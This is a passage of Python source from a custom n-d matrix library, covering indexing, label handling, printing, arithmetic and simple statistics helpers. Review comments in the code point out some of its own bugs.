                    element = inner_list[i][j]
                except:
                    break
                if isinstance(element, float):
                    element = floor(element)
                if col_length < len(str(element)):
                    col_length = len(str(element))
            # indice part: header rows appended after the body above
            for i in range(len(self.Headers)):
                try:
                    element = inner_list[i+size[0]][j]
                except:
                    break
                if isinstance(element, float):
                    element = floor(element)
                if col_length < len(str(element)):
                    col_length = len(str(element))
            width_list.append(col_length)
        return {'float':_float, 'width':width_list}

    def _init_array_formatter(self, indice=None, _float=0, _width=2):
        """Single-column width computation for an index/label column."""
        col_length = _width
        for j in range(len(indice)):
            element = indice[j]
            if isinstance(element, float):
                element = floor(element)
            if col_length < len(str(element)):
                col_length = len(str(element))
        return {'float': _float, 'width':[col_length]}
    init_array_formatter = _init_array_formatter

    # interface function used by the Formatter descriptor
    def _init_formatter(self, _float=2, _width=2, formatter=None):
        return self._init_matrix_formatter(_float, _width, formatter)

    # matrix STL iterators
    class matrixIterator(object):
        """Odometer-style iterator yielding elements (or index tuples) of the
        host matrix in row-major order over its full n-d shape."""
        def __init__(self, Mat):
            self.matrixArray = Mat
            self.counter = self.__counter__()
        def __iter__(self):
            return self
        ## ! just for two dimensions for the moment
        def __counter__(self):
            def routine(iter, size, curr):
                # increment the current digit; overflow carries leftwards
                try:
                    iter[curr] += 1
                except Exception:
                    pass
                # check whether it is flow out
                if iter[curr] >= size[curr]:
                    # last positon
                    if curr == 0:
                        return True
                    else:
                        # clear the current bit
                        iter[curr] = 0
                        # go into higher bit
                        return routine(iter, size, curr - 1)
                return False
            # comment the following lines when debug, otherwise comment out
            # when apply matrix 2 list this will be called
            size = self.matrixArray._get_shape_array()
            # initialization
            tier = len(size)
            # iteration indice
            iter = tier * [0]
            while True:
                yield iter
                # update
                signal = routine(iter, size, tier - 1)
                # exit processing
                if signal:
                    break
        def __next__(self):
            try:
                index = next(self.counter)
                return self.matrixArray[tuple(index)]
            except StopIteration:
                raise StopIteration()
        def nextIndex(self):
            # like __next__ but yields the index tuple instead of the value
            try:
                index = next(self.counter)
                return tuple(index)
            except StopIteration:
                raise StopIteration()
        def __str__(self):
            return "matrix iterator"

    def setup_r_mode(self):
        # R mode: label-aware indexing (headers/indice), R-language style
        if self.R != True:
            self.R = True

    def clear_r_mode(self):
        if self.R == True:
            self.R = False
            self.clear_headers().clear_indice()

    def clear_headers(self):
        self.col_indexList.clear()
        self.Headers.clear()
        return self

    def clear_indice(self):
        self.row_indexList.clear()
        self.Indice.clear()
        return self

    def setIndice(self, l):
        """Register *l* (a label list, or a column position to pop) as row
        labels; enables R mode."""
        if not isinstance(l, list):
            l = self._popCol(l)
        if len(l) == 0:# pythonic way to check empty list
            return -1
        from itertools import zip_longest
        self.row_indexList.append( dict(zip_longest(l,
                                   range(0, self.size.row)
                                   )) )
        self.setup_r_mode(); self.Indice.append(l)

    def isIndex(self, val):
        # map a row label to its positional index (None when unknown)
        for item in self.row_indexList:
            if val in item:
                return item[val]

    def setheader(self, l):
        """Register *l* (a label list, or a row position to pop) as column
        headers; enables R mode."""
        if not isinstance(l, list):
            l = self._popRol(l)
        if len(l) == 0:
            return -1
        from itertools import zip_longest
        self.col_indexList.append( dict(zip_longest(l,
                                   range(0, self.size.col)
                                   )) )
        self.setup_r_mode(); self.Headers.append(l)

    def isheader(self, val):
        # map a column label to its positional index (None when unknown)
        for item in self.col_indexList:
            if val in item:
                return item[val]

    def isIndexHeader(self, val):
        """Resolve *val* as a row label (axis 0) or column label (axis 1);
        returns (position, axis) or (None, None)."""
        result = self.isIndex(
            val)
        if result is not None:
            return (result, 0)
        result = self.isheader(
            val)
        if result is not None:
            return (result, 1)
        else:
            return (None,None)

    @property
    def x_label_enabled(self):
        return True if len(self.Indice) > 0 and len(self.Indice[0]) > 0 else False

    @property
    def y_label_enabled(self):
        return True if len(self.Headers) > 0 and len(self.Headers[0]) > 0 else False

    def _pop(self, *index):
        # I will consider to extend its functionalities later
        # basic logic is 'del' the object the matrix container referred
        root = self.get_runtime_list()
        return self.setitem(index, None, root, "-")

    def _popCol(self, col):
        """Remove and return column *col* as a plain list."""
        # pythonic way to give data simultaneously
        size, list = self.size, []
        # collect data returned
        for i in range(size.row):
            list.append( self._pop(i, col) )
        return list

    def _popRol(self, row):
        """Remove and return row *row* as a plain list."""
        # pythonic way to give data simultaneously
        size, list = self.size, []
        # collect data returned
        for i in range(size.col):
            list.append( self._pop(row, i) )
        return list

    def web2list(self, web, header):
        """Load a list of record dicts (*web*) using *header* as both the
        column order and the header labels."""
        h = header; l = [[record[key] for key in h] for record in web]
        # load data
        self.setUp(l)
        # set header
        self.setheader(h)

    #===========================================================================
    # n-d matrix helper functions
    #===========================================================================
    def name(self):
        return "matrixArrayLists:"

    #===========================================================================
    # elementary setup funciton from a iterable
    #===========================================================================
    def _toRow(self, r, c, l):
        """Extend self with *l* interpreted as a single row; returns True when
        one of the row-vector shapes matched."""
        # row vector
        if not c and (r and r == 1):
            if not isinstance(l[0], list):
                self.extend([l])
                self.modifed_to_row_col = True
            else:
                self.extend(l)
            return True
        # row vector:[[0,1,2...]]
        if c and c != 1 and (r and r == 1):
            if not isinstance(l[0], list):
                self.extend([l])
                self.modifed_to_row_col = True
            else:
                self.extend(l)
            return True
        if c and c != 1 and not r:
            if not isinstance(l[0], list):
                self.extend([l])
                self.modifed_to_row_col = True
            else:
                self.extend(l)
            return True

    def _toCol(self, r, c, l):
        """Extend self with *l* interpreted as a single column; returns True
        when one of the column-vector shapes matched."""
        # col vector processing, simple mode
        if r and r != 1 and not c:
            for i in l:
                if isinstance( i, list ):
                    self.append( i )
                else:
                    self.append([i])
            self.modifed_to_row_col = True
            return True
        # col vector processing, simple mode
        if r and r != 1 and (c and c == 1):
            # row vector:[[0],[1],[2],,,]
            for i in l:
                if isinstance( i, list ):
                    self.append( i )
                else:
                    self.append([i])
            self.modifed_to_row_col = True
            return True
        # col vector
        if not r and (c and c == 1):
            for i in l:
                if isinstance( i, list ):
                    self.append( i )
                else:
                    self.append([i])
            self.modifed_to_row_col = True
            return True

    def clear(self):
        super(matrixArrayLists, self).clear()
        # clear up all related marks
        # clear modified tag
        self.clear_modify_tag()
        # clear up all associated indice
        self.clear_r_mode()

    def clear_modify_tag(self):
        if self.modifed_to_row_col is True:
            self.modifed_to_row_col = False

    def setUp(self, l=None, r=None, c=None, o=None):
        """Replace the contents with *l*, shaping it as a row/column vector or
        2-d list depending on the r/c hints; non-list *l* is consumed via the
        matrix iterator protocol."""
        # clean up
        self.clear()
        # set up container values
        if str(type(l)) == "<class 'list'>":
            # calling from inside
            if o == 'ori':
                self.extend(l)
                return
            # for default situation, from outside
            if r == None and c == None:
                flag = True
                for i in l:
                    if isinstance(i, list):
                        pass
                    else:
                        flag = False
                        break
                if flag:
                    self.extend(l)
                    return
                else:
                    c = 1
            #===================================================================
            # col - vector processing
            #===================================================================
            # col vector processing, simple mode
            if r and r != 1 and not c:
                for i in l:
                    if isinstance( i, list):
                        self.append( i )
                    else:
                        self.append([i])
                self.modifed_to_row_col = True
                return
            # col vector processing, simple mode
            if r and r != 1 and (c and c == 1):
                # row vector:[[0],[1],[2],,,]
                for i in l:
                    if isinstance( i, list):
                        self.append( i )
                    else:
                        self.append([i])
                self.modifed_to_row_col = True
                return
            # col vector
            if not r and (c and c == 1):
                for i in l:
                    if isinstance(i, list):
                        self.append(i)
                    else:
                        self.append([i])
                self.modifed_to_row_col = True
                return
            #===================================================================
            # row vector processing
            #===================================================================
            # row vector
            if not c and (r and r == 1):
                if not isinstance(l[0], list):
                    self.extend([l])
                    self.modifed_to_row_col = True
                else:
                    self.extend(l)
                return
            # row vector:[[0,1,2...]]
            if c and c != 1 and (r and r == 1):
                if not isinstance(l[0], list):
                    self.extend([l])
                    self.modifed_to_row_col = True
                else:
                    self.extend(l)
                return
            if c and c != 1 and not r:
                if not isinstance(l[0], list):
                    self.extend([l])
                    self.modifed_to_row_col = True
                else:
                    self.extend(l)
                return
            #===================================================================
            # special situation
            #===================================================================
            if r and r == 1 and c and c == 1:
                if not isinstance(l[0], list):
                    self.extend([l])
                    self.modifed_to_row_col = True
                else:
                    self.extend(l)
                return
            #===================================================================
            # by default
            #===================================================================
            self.extend(l)
        else:
            # assumes l supports the matrixIterator protocol (nextIndex) —
            # i.e. another matrix; copy element-wise
            it_index, it_value = l.__iter__(), l.__iter__()
            while True:
                try:
                    index, value = it_index.nextIndex(), it_value.__next__()
                    # use redefined method
                    # use customised magic expression "mat[:,[1,2,3],0,2:4] = another_matrix"
                    self[index] = value
                    # this is actually an expression
                except StopIteration:
                    break
        # modify shape accordingly

    #===============================================================================
    # basic matrix filling function, m = matrixArray(list1, list2, list3 ...)
    #===============================================================================
    def fillUp(self, *iterators):
        """Fill this matrix in iteration order from each iterable in turn."""
        obj = self
        for itx in iterators:
            itl, itr = ( obj.__iter__(), itx.__iter__())
            while True:
                try:
                    p, q = (itl.nextIndex(), itr.__next__())
                    # use redefined method
                    obj[p] = q
                except StopIteration:
                    break
        return self

    def nil_multi(self, *args):
        """Rebuild self as an n-d null matrix with dimensions *args*
        (breadth-first construction, leaves filled with Null)."""
        from copy import deepcopy
        # To do
        # check r, c, when it is used by user
        super(matrixArrayLists, self).clear()
        deep = len(args)
        # set root node
        root = [None for i in range(args[0])]
        # initialize a queue
        queue = []
        queue.append((root,0))
        # breadth first searching
        while len(queue) > 0:
            child, i = queue.pop(0)
            # modify children
            for j in range(args[i]):
                child[j] = deepcopy([None] * args[i+1])
                if i+1 < deep-1:
                    queue.append( (child[j], i+1) )
                else:
                    # leaf level: fill with Null placeholders
                    # (note: inner loop reuses the name j, as in the original)
                    gchild = child[j]
                    for j in range(0, args[i+1]):
                        gchild[j] = Null()
        # reset the empty matrix
        self.setUp(root)

    # this help funciton is exclusively for 2-demension case. I consider it seriously.
    def nil(self, r, c, value=None):
        """Rebuild self as an r x c matrix of deep copies of *value*."""
        from copy import deepcopy
        # To do
        # check r, c, when it is used by user
        super(matrixArrayLists, self).clear()
        self.setUp([deepcopy([deepcopy(value) for _ in range(c)]) for _ in range(r)])

    # further extension from nil function
    def Zeors(self, r, c=None):
        if c == None:
            self.nil(r, r, 0)
        else:
            self.nil(r, c, 0)

    def __call__(self, key=None, value=None):
        """Raw list access: () -> self, (key) -> plain list.__getitem__,
        (key, value) -> plain list.__setitem__ (bypasses matrix indexing)."""
        if key == None:
            return self
        elif key != None:
            if value == None:
                return super(matrixArrayLists, self).__getitem__(key)
            elif value != None:
                super(matrixArrayLists, self).__setitem__(key, value)
                return self

    @timmer
    def tolist(self):
        """Return plain-list contents, unwrapping a single row or
        single-element rows so vectors come back flat."""
        l = self.get_runtime_list()
        # if it is a vector we need to leave it as list format
        # vector processing
        if len(l) == 1:
            if isinstance(l[0],list):
                l = l[0]
        else:
            for i, v in enumerate(l):
                if isinstance(v, list):
                    if len(v) == 1 :
                        l[i] = v[0]
        return l

    def get_runtime_list(self):
        # shallow copy of the raw nested-list payload
        return self(slice(0, len(self)))

    def __setattr__(self, name, value):
        # tuple "names" are silently ignored (guards against tuple-key
        # attribute writes); everything else goes straight to __dict__
        if isinstance(name, tuple):
            pass
        elif True:
            self.__dict__[name] = value

    def __iter__(self):
        return self.matrixIterator(self)

    def setitem(self, id, element, l, type="+"):
        """Write ("+") or pop ("-") a single element at index path *id* inside
        nested list *l*, growing intermediate levels with Null padding."""
        # see index processing from int, slice, list and tuple.
        # [[1],[1,2,3,4],[5]...] --> [1] or [1,2,3,4] or [5] --> [1,1,5], [1,2,5], [1,3,5],[1,4,5]..., depth first searching is applied to do such indexing
        # this assuming that value will automaticaly fill the part what index indicates
        # e.g.: 'matrix[[1,2,3],0] = value' means that find elements in 'value' to fill in a[1,0], a[2,0], a[3,0]
        curr = 0
        hook = l
        while curr < len(id) -1:
            try:
                l = l[id[curr]]
                curr += 1
                if isinstance(l, list):
                    # descend into the next level
                    hook = l
                else:
                    # scalar found where a level was expected: wrap it
                    l = [l]
                    hook[id[curr-1]] = l;hook = l
            except:
                # index out of range: pad this level with Null placeholders
                steps = id[curr] - len(l) + 1
                # l.extend([Null() for _ in range(steps)])
                l.extend([Null()] * steps)
        while True:
            try:
                if type == "+":
                    # element casting
                    # NOTE(review): matrix2list is defined outside this chunk —
                    # presumably flattens a matrix element before storing
                    l[id[curr]] = element if not isinstance(element, self.__class__) \
                        else element.matrix2list(); break
                elif type == "-":
                    # available for retrieve
                    return l.pop(id[curr])
                else:
                    raise Exception("wrong type!")
            except:
                steps = id[curr] - len(l) + 1
                # l.extend([Null() for _ in range(steps)])
                l.extend([Null()] * steps)

    @timmer
    @index_map
    def getitem(self, _id, l):
        """Fetch the elements of *l* at positions *_id* (clipped by
        @index_map); returns [Null()] on failure."""
        # see index processing from int, slice, list and tuple
        # [[1],[1,2,3,4],[5]...] --> [1] or [1,2,3,4] or [5] ...,
        try:
            return list(map(lambda idx: l.__getitem__(idx), _id))
        except:
            # this will be enhanced for some scenarios
            return [Null()]

    def setitem_multi(self, ids, root, it, type="+"):
        """Apply setitem over the cartesian product of per-axis index lists
        *ids*, drawing elements from *it* (iterator or constant)."""
        # deduce user behavior
        # get all possible id for setting
        def element_generator():
            # one element per call: next(it) for iterators, it itself otherwise
            yield next(it) if hasattr(it,'__next__') else it
        def routines(curr):
            # exitance: innermost axis writes the elements
            if curr == depth:
                for i in ids[curr-1]:
                    index[curr-1] = i
                    try:
                        self.setitem(index, next(element_generator()), root, type)
                    except StopIteration:
                        return
            else:
                for i in ids[curr-1]:
                    index[curr-1] = i
                    # push into functional stack
                    routines(curr+1)
        def routines2(curr):
            # pop variant; NOTE(review): `list + [...]` discards its result,
            # so collected values are lost — looks like a latent bug, confirm
            list = []
            # exitance
            if curr == depth:
                for i in ids[curr-1]:
                    index[curr-1] = i
                    try:
                        list + [self.setitem(index, next(element_generator()), root, type)]
                    except StopIteration:
                        return list
            else:
                for i in ids[curr-1]:
                    index[curr-1] = i
                    # push into functional stack
                    list + routines(curr+1)
        depth = len(ids)
        # this initialization will reduce exception handling
        index = depth * [0]
        # running
        if type == '+':
            routines(1)
        if type == '-':
            return routines2(1)
        # raise an error here

    def getitem_multi(self, ids, root):
        """Breadth-first gather of all elements addressed by the per-axis
        index lists *ids*; returns a flat list."""
        # convert tuple to list(queue) to obtain built-in methods
        # breadth first strategy
        l = len(ids)
        stack = [(root, 0)]
        final = []
        while len(stack) != 0:
            try:
                child, axis = stack.pop(0)
                # processing
                for grdchild in self.getitem(ids[axis], child):
                    if axis < l - 1:
                        stack.append((grdchild, axis+1))
                    else:
                        # item = self.getitem(ids[axis], grdchild)
                        final.append( grdchild )
            except IndexError as e:
                print(e)
                break
        return final

    def __setitem__(self, key, value):
        """Matrix-aware assignment supporting int/slice/list/tuple keys and
        implicit axis padding for vectors."""
        size = self._get_shape_array()
        # middleware preprocessing
        hint = index_len(key, size)
        # middleware preprocessing
        key = index_val(key, size)
        # get inner representation
        root = self.get_runtime_list()
        # infer user's intention
        # enhanced functionality for better customers experience
        if len(hint) == 1 or (size.__len__() > len(hint) and 1 in size): # should use >= provided that i cannot be exec if matrix is empty
            # entry point: pad the key with [0] on degenerate leading/trailing axes
            def get_offset():
                result = [v for v in key]
                for i in range(size.__len__()):
                    if size[i] != 1:
                        break
                offset = [[0]] * i# errors might occur
                offset.extend(result)
                result = offset
                for i in range(size.__len__()):
                    if size[len(size) - i - 1] != 1:
                        break
                offset = [[0]] * i# errors
                result.extend(offset)
                return tuple(result)
            # redefine
            key = get_offset()
        if max(hint) <= 1:
            # single-cell write
            self.setitem([item[0] for item in key], value, root)
        else:
            # the value might not have an iterator, hence the hasattr check
            self.setitem_multi(key, root, value) if not hasattr(value, '__iter__') else \
                self.setitem_multi(key, root, value.__iter__())
        # make changes to the whole matrixArray
        self.setUp(root)
        return \
            self

    @timmer
    @map_key
    def __getitem__(self, key):
        """Matrix-aware retrieval: scalars for fully-specified keys, new
        matrix instances for partial keys; Null() on any failure."""
        size = self._get_shape_array()
        # middleware preprocessing
        hint = index_len(key, size)
        # middleware preprocessing
        key = index_val(key, size)
        # get inner representation of the query object
        root = self.get_runtime_list()
        try:
            if max(hint) <= 1:
                # return the value wrapped in the list
                # judge this by user inputting and matrix dimensions
                if len(hint) == len(size):
                    slot = self.getitem_multi(key, root)
                    return slot[0]# 01
                # user might use a simple way to get list data
                if len(hint) + size.count(1) \
                        == len(size):
                    # expand the key with [0] on every degenerate axis
                    def realidx():
                        it = key.__iter__(); id = []
                        for i in size:
                            id.append([0] if i == 1 else next(it))
                        return id
                    real = realidx()
                    slot = self.getitem_multi(real, root)
                    return slot[0]# 02
                else:
                    slot = self.getitem_multi( key, root)
                    return self.__class__(slot,r=hint[0])# 03
            # number = slot[0][0] if isinstance(slot[0], list) else slot[0]
            # return number if len(hint) == len(size) or 1 in size \
            #     else self.__class__(slot, r=hint[0])
            # later I will wrap this method in middleWare postprocessing
            # some additional adjustment to make sure it is safe and stable
            # get inner representation of the query result
            slot = self.getitem_multi(key, root); array = []
            if len(hint) >= 3:
                # strip trailing singleton axes from the hint
                for i in range(len(hint) - 1):
                    if hint[len(hint) - 1 - i] != 1: break
                hint = hint[0:len(hint) - i]
            # rebuild the selection into a dense nested list
            self.setitem_multi( tuple(map(list, map(range, hint))), array, iter(slot) )
            # go
            if len(hint) == 1:
                return self.__class__(array, r=hint[0]) #04
            else:
                return self.__class__(array, r=hint[0], c=hint[1]) #05
        except:
            return Null()

    def _str(self):
        """Render the body into a list of string fragments; returns
        (fragments, size, formatter) for __str__ to post-process."""
        size = self.size
        if len(size) > 2:
            pass#return self.name() + '\n' + super(matrixArrayLists, self).__str__()
        formatter = self.formatter
        # string representation
        out = []#""
        pre = ' '
        succ = '\n'
        c = self.get_runtime_list()
        # set title
        out.extend([self.name() + '\n\n', "["]) # 0, 1
        for a in range(len(c)):
            out.append(pre) # position 1 + self.col * (a + 1)
            for b in range(len(c[a])):
                out.append(self._element2str(a, b, c, formatter))
            # pad short rows out to size.col cells ('-' placeholders)
            for d in range(b + 1, b + size.col - len(c[a]) + 1):
                out.append(self._element2str(a, d, c, formatter))
            # handling for special cases
            if a < len(c) - 1:
                out.extend([succ, pre])
        out.append("]\n")# position 1 + size.row * size.col
        return out, \
            size, \
            formatter

    def _header(self, axis=None,
                formatter=None, l=None):
        """Render one header-label row, padded with Null out to *axis* cells."""
        # string representation
        out = []#""
        pre = ' ' + ' '
        succ = '\n'
        # this is random, very dangerous
        c = l
        # add pre
        out.append(pre)
        for b in range(len(c)):
            out.append(self._element2str_sim(0, b, c[b] , formatter))
        for d in range(b + 1, b + axis - len(c) + 1):
            out.append(self._element2str_sim(0, d, Null(), formatter))
        out.append(succ)
        # NOTE(review): debug print left in by the original author
        print( out)
        return out

    # helper function for rendering
    def _indice(self, axis=None,
                formatter=None, l=None):
        """Render one index-label column, padded with Null out to *axis* cells."""
        # string representation
        out = []#""
        pre = ' ' + ' '
        succ = '\n'
        # this is random, very dangerous
        c = l
        # add pre
        out.append(pre)
        for b in range(len(c)):
            out.append(self._element2str_sim(b, 0, c[b] , formatter))
        for d in range(b + 1, b + axis - len(c) + 1):
            out.append(self._element2str_sim(b, 0, Null(), formatter))
        out.append(succ)
        return out

    def __str__(self):
        out, size, formatter = self._str()
        if self.R == True:
            # offset controlling, a, b parameters
            # add header
            a = 0
            for item in self.Headers:
                header = self._header(size.col, formatter, item)
                out.insert(1, ''.join(header)); a += 1
            # add index
            for item in self.Indice:
                # call this help function to dynamically change formatter
                formatter.data = self.init_array_formatter(item)
                index = self._indice(size.row, formatter, item)
                # modify indice (index[1:] drops the leading pre fragment)
                self._modify_line(out, index[1:], a,
                                  size)
            # b = 0
            # for line in out[a+1:]:
            #     pass#line.insert(0, index[b]); b += 1
        return ''.join(out)

    # out must be list so that it is mutable
    def _modify_line(self, out, index, offset, size):
        """Prepend index-label fragments onto each rendered row in *out*;
        header lines (first *offset*) get matching blank padding."""
        row = size.row
        col = size.col
        # modify header
        for i in range(offset):
            out[i + 1] = ' ' * len(index[0]) + out[i + 1]
        # modify body
        # empirical equation for this matrix: each row occupies col+3 fragments
        for i in range(row):
            out[i*(col + 3) + offset + 1] = index[i] + out[i*(col + 3) + offset + 1]

    # by index
    def _element2str(self, a, b, c,
                     formatter):
        # value errors/logic wrapped here: fall back to the row itself, then
        # to a '-' placeholder for missing cells
        try:
            return formatter(c[a][b], a, b)
        except TypeError:
            return formatter(c[a], a, b)
        except IndexError:
            return formatter('-' , a, b)

    # by value
    def _element2str_sim(self, a, b, c, formatter):
        return formatter(c, a, b)

    def _get_shape_array(self):
        """Compute the shape as a plain list by breadth-first scanning the
        nested payload; each axis records the maximum length found."""
        queue = []
        shape = []
        axis = 0
        # updating axis
        axis += 1
        root = self.get_runtime_list()
        # updating current axis
        shape.append(len(root))
        # start processing
        queue.append((root,axis))
        # compute next dimensions
        def routines(obj, shape, axis, queue):
            while len(queue) > 0:
                child, axis = queue.pop(0)
                # temporary storage
                array = []
                if len(child) == 0: array.append( 0)
                elif len(child) >= 1:
                    # breadth first searching
                    for i in range(len(child)):
                        if isinstance(child[i], list):
                            array.append(len(child[i]))
                            queue.append((child[i], axis+1))
                        elif True:
                            array.append(1)
                # updating current axis - maximum length
                # axis control the looping layer
                _max = max(array)
                # try to update shape
                try:
                    if shape[axis] < _max:
                        shape[axis] = _max
                except:
                    shape.append(_max)
        routines(root, shape, axis, queue)
        return shape[0:-1]

    def trp(self):
        """Return the transpose as a new matrix of the same class."""
        size = self.size
        mat = self.__class__(size.col, size.row)
        for i in range(size.col):
            for j in range(size.row):
                mat[i,j] = self[j,i]
        return mat

    def is_equal(self, obj):
        # NOTE: the trailing raise after `return` on the same line is
        # unreachable (kept from the original)
        return self.size.assert_equal(obj.size) if isinstance(obj, self.__class__) else (self.size, None, False); raise(Exception('wrong types: should be matrix'))

    def is_tolerate(self, obj):
        # NOTE: the trailing raise is unreachable, as in is_equal
        return self.size.assert_tolerate(obj.size) if isinstance(obj, self.__class__) else (self.size, None, False); raise(Exception('wrong types: should be matrix'))
#===============================================================================
# operations between matrix
#===============================================================================
def union(*c, direction='l2r'):
    '''
    Created on 10 Dec, 2014
    @author: wangyi, Researcher Associate @ EIRAN, Nanyang Technological University
    @email: L.WANG@ntu.edu.sg
    @copyright: 2014 www.yiak.co. All rights reserved.
    @license: license
    @param: c: matrices to be concatenated into a fresh matrixArrayLists
    @decription: concatenate matrices left-to-right ('l2r', row-wise extend)
                 or top-to-bottom ('u2d', appending rows)
    @param: union
    '''
    def routine(left, right, direction):
        if direction == 'l2r':
            if isinstance(left, matrixArrayLists) and isinstance(right, matrixArrayLists):
                for i in range(0, max(left.size[0], right.size[0])):
                    r = left[i]
                    if r != None:
                        # see documentation for difference between () and []:
                        # () is raw list access, so the row list is extended in place
                        left(i).extend(right[i])
                    elif r == None:
                        # do assignment
                        left[i]=right[i]
        elif direction == 'u2d':
            if isinstance(left, matrixArrayLists) and isinstance(right, matrixArrayLists):
                for i in range(0, max(left.size[1], right.size[1])):
                    # see documentation for difference between () and []
                    left.append(right(i))
    # create an empty matrix
    a = matrixArrayLists()
    # main loop: fold every argument into the accumulator
    for b in c:
        routine(a, b, direction)
    # print a for test
    return a
def row(m, i, j):
    """Swap rows *i* and *j* of matrix *m* in place."""
    # both rows are fetched before either assignment, matching the original
    # temp-variable sequence
    m[i, :], m[j, :] = m[j, :], m[i, :]
def col(m, i, j):
    """Swap columns *i* and *j* of matrix *m* in place."""
    # both columns are fetched before either assignment, matching the
    # original temp-variable sequence
    m[:, i], m[:, j] = m[:, j], m[:, i]
import math
from operator import *
# this is one of key features provided by Python3
from functools import reduce
from statistics import *
# TO DO PYCUDA IMPLEMENTATION
# TO DO PYCUDA IMPLEMENTATION
class matrixArrayNum(matrixArrayLists):
    """Numeric matrix: adds element-wise arithmetic (via operator module
    names brought in by `from operator import *`) on top of the generic
    container."""
    def __init__(self, *args, **hints):
        super(matrixArrayNum, self).__init__(*args, **hints)

    def match(self):
        """
        match will extract the insection of indice and and headers of self and all iteralbles.
        """
        pass

    def name(self):
        return "matrixArrayNum:"

    def map(self, Func, *iterables):
        """Apply *Func* element-wise over self (zipped with any parallel
        iterables) and wrap the result in a new matrix of the same shape."""
        # do some preprocessing
        # match self with *iterables
        map_object = map(Func, self, *iterables)
        try:
            # self.size returns a fresh Size snapshot on every access (see
            # Size.__get__), so appending here only grows that local copy:
            # args becomes [row, col, mapped-values], feeding the
            # (ints..., list) constructor path
            args = self.size.append([m for m in map_object])
        except:
            pass
        # post processing
        return self.__class__(*args)#self.__class__([m for m in map_object])

    def add_matrix(self, obj):
        # matrix + matrix when shapes agree, otherwise broadcast the scalar
        return self.map(add, obj) if all(self.is_equal(obj)) \
            else self.map(lambda v: v + obj)# error will be raised inside
    __add__ = add_matrix
    __radd__ = __add__

    def sub_matrix(self, obj):
        return self.map(sub, obj) if all(self.is_equal(obj)) \
            else self.map(lambda v: v - obj)# error will be raised inside
    __sub__ = sub_matrix
    __rsub__ = __sub__

    def neg_matrix(self):
        return self.map(neg)
    __neg__ = neg_matrix

    # self add module
    # single operant operator
    def iad_matrix(self, other):
        return self.add_matrix(other)
    __iadd__ \
        = iad_matrix

    def dot_in(self, obj):
        """Inner (matrix) product; scalar operand broadcasts element-wise.
        A 1xN . Nx1 product collapses to a plain float."""
        sizel, sizer , flag = self.is_tolerate(obj)
        if flag == False:
            return self.map(lambda v: v * obj)
        # return numeric value
        if sizel.row == 1 and sizer.col == 1:
            sum = 0.0
            for k in range(sizel.col):
                sum += self[0,k] * obj[k,0]
            return sum
        # return matrixArray-series object
        mat = self.__class__(sizel.row, sizer.col)
        for i in range(sizel.row):
            for j in range(sizer.col):
                sum = 0.0
                for k in range(sizel.col):
                    sum += self[i,k] * obj[k,j]
                mat[i,j] = sum
        return mat
    # ideally if the two vectors are tolerated to each other we call dot_in. Otherwise, if they have the same size we call dot_out
    __mul__ = dot_in
    __rmul__ = __mul__

    def dot_out(self, obj):
        pass

    def div_matrix(self, obj):
        # NOTE(review): when flag is truthy (matrix / matrix) this falls
        # through and returns None — matrix-by-matrix division looks
        # unimplemented; confirm callers only divide by scalars
        sizel, sizer , flag = self.is_tolerate(obj)
        if flag == False:
            return self.map(lambda v: v / obj)
    __truediv__ = div_matrix

    # one way to implement mean of matrix: matrix algebra, this is an example, not recommended
    # because if the matrix is a row vector, .mean_vt cannot summarise a result
    def mean_vt(self, index=None):
        """Column-wise mean computed by summing row vectors."""
        result = self[0,:]; size = self.size
        # add rows
        for i in range( 1, size.row ):
            result += self[i,:]
        return result / size.row

    def ubds_vt(self, index=None):
        """Biased standard-deviation helper, optionally over one column."""
        # older method to implement it has been deprecated
        # check size now
        if index != None:
            return ubds(self[:, index])
        return ubds(self)
## Relations between matrices -----------------------------------------------
def isum(*c, offset=0):
    """Sum several matrices (plus an optional starting offset).

    With a single argument, sum that argument's own elements instead;
    `offset` is ignored in that case.
    @param c: matrice
    """
    if len(c) > 1:
        return sum(c, offset)
    return sum(c[0])
def imean(*c):
    """Mean over several matrices (or the mean of a single matrix/vector).

    Currently supports nd matrices and 1d vectors only.
    @param c: matrice
    """
    if len(c) > 1:
        return sum(c) / len(c)
    return mean(c[0])
def ubds(*c):
    """Spread (standard-deviation-like) statistic for one or more matrices/vectors.

    Vector input  -> a single float.
    Matrix input  -> a list with one value per column.
    Several args  -> a list with one result per argument.
    @param c: matrice
    """
    def ubd(v):
        # NOTE(review): this computes sqrt(sum((v-m)**2)) / n, i.e. divides by
        # n *after* the square root -- not the usual sqrt(sum(...)/n) standard
        # deviation.  Confirm the intended formula.
        new_v = [(i-m) **2 for i in v]
        # in case of row or col vectors
        return math.sqrt( sum(new_v) ) / len(new_v)
    if len(c) > 1:
        # several matrices: recurse on each one
        return [ubds(item) for item in c]
    else:
        # vector, ubds: 1/n * sqrt( sum ( [(v - mean) ** 2 for v in vector] ) )
        # matrix, ubds: [ubds(col) for col in matrix]
        size = c[0].size
        if size.col == 1 or size.row == 1:
            vector = c[0]; m = mean(vector)# ubd() above closes over this m
            return ubd(vector)
        else:
            matrix = c[0]
            # matrix api does not provides col selector
            return [ubds(matrix[:,i]) for i in range(size.col)]
class matrixArray(matrixArrayNum):
    """Thin subclass of matrixArrayNum; only customizes the display name."""
    def __init__(self, *args, **hints):
        # BUG FIX: the original called super(self.__class__, self), which
        # resolves against the *runtime* class -- any subclass of matrixArray
        # would recurse infinitely in __init__.  Name the class explicitly
        # (works on both py2 and py3).
        super(matrixArray, self).__init__(*args, **hints)
    def name(self):
        # label used when rendering the matrix
        return "matrixArray:"
# for easy testing purpose
a = _TEST_MATRIX_MULTI = matrixArrayNum([
[['000', '001', '002'], ['010', '011', '012'], ['020', '021', '022']],
[['100', '101', '102'], ['110', '111', '112'], ['120', '121', '122']],
[['200', '201', '202'], ['210', '211', '212'], ['220', '221', '222']],
[['300', '301', '302'], ['310', '311', '312'], ['320', '321', '322']]
])
b = _TEST_COMPUT = matrixArrayNum(5, 5)
from numpy import array
e = _TEST_array = array([
[['000', '001', '002'], ['010', '011', '012'], ['020', '021', '022']],
[['100', '101', '102'], ['110', '111', '112'], ['120', '121', '122']],
[['200', '201', '202'], ['210', '211', '212'], ['220', '221', '222']],
[['300', '301', '302'], ['310', '311', '312'], ['320', '321', '322']]
])
if __name__ == "__main__":
# 2015 5:
# a[:]
# b = a[:,:,0]
# b = matrixArrayNum([[1,2,3,],[4,5,6]])
# b[0, 5] = 100
# b[5] = 100
# b.setheader(['header_1', 'header_2'])
# print(b)
# b[[0,5],[0,5]]
# print(b)
# b.setIndice('header_1')
# c = b.trp() * b
# b[0,10] = -1
# b.clear()
# b[5] = 100
# print(b)
# var = input("please input...\n")
# print(var)
# pass
